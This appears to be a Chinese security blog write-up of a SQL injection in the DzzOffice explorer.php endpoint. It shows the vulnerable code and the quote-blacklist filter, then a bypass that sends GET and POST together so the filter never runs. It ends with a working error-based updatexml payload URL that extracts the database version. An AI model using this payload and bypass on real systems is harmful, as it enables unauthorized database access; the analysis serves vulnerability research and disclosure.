PHP…

SQL注入

出现在/dzz/system/explorer.php的151行

1
2
3
4
5
6
$arr=array();
$icos=array();
$icosdata=array();
$folderdata=array();
$folderids=array();
if($folder=DB::fetch_first('select * from '.DB::table('folder')." where fid='{$id}'")){

$id赋值出现23~30行

1
2
3
4
5
6
$sid=empty($_GET['id'])?0:$_GET['id'];
$winid=$_GET['winid'];
$bz=rawurldecode($_GET['bz']);
$path=rawurldecode($_GET['path']);
$data=array();
list($prex,$id)=explode('-',$sid);

可以看到$sid的值被分割并分别赋给$prex、$id
继续往下看到117~151行

1
2
3
4
5
6
elseif($prex=='f'){
if($bz){
...
else{
...
if($folder=DB::fetch_first('select * from '.DB::table('folder')." where fid='{$id}'")){

从上面可以看出我们只需要让$prex=’f’就能进入到这个sql触发点
路由是从/dzz/system/save.php得到

payload:

1
index.php?mod=system&op=explorer&do=get_children&id=f-123'

被过滤了,Debug信息中出现了几个疑是过滤函数的信息
发现在/core/class/dzz/dzz_app.php的_init_outpt函数中

1
2
3
4
5
private function _init_output() {

if($this->config['security']['urlxssdefend'] && $_SERVER['REQUEST_METHOD'] == 'GET' && !empty($_SERVER['REQUEST_URI'])) {
$this->_xss_check();
}

寻找_xss_check函数,内容如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
private function _xss_check() {

static $check = array('"', '>', '<', '\'', 'CONTENT-TRANSFER-ENCODING');

if($_SERVER['REQUEST_METHOD'] == 'GET' ) {
$temp = $_SERVER['REQUEST_URI'];
} elseif(empty ($_GET['formhash'])) {
$temp = $_SERVER['REQUEST_URI'].file_get_contents('php://input');
} else {
$temp = '';
}

if(!empty($temp)) {
$temp = strtoupper(urldecode(urldecode($temp)));
foreach ($check as $str) {
if(strpos($temp, $str) !== false) {
system_error('request_tainting');
}
}
}

return true;
}

可以发现单引号是被列入了黑名单的,所以触发了错误.
但是可以从_init_output函数绕过

1
2
3
4
5
private function _init_output() {

if($this->config['security']['urlxssdefend'] && $_SERVER['REQUEST_METHOD'] == 'GET' && !empty($_SERVER['REQUEST_URI'])) {
$this->_xss_check();
}

它的判断中有个$_SERVER['REQUEST_METHOD'] == 'GET',所以可以通过GET和POST同时传参数进去,就可以不用进入_xss_check函数

payload:

1
2
3
4
GET:
index.php?mod=system&op=explorer&do=get_children&id=f-123' and updatexml(1,concat('~',version(),'~'),1) and '1'='1
POST:
1=1

注:可以通过绕过过滤函数触发条件,从而绕过过滤函数.

(ง •_•)ง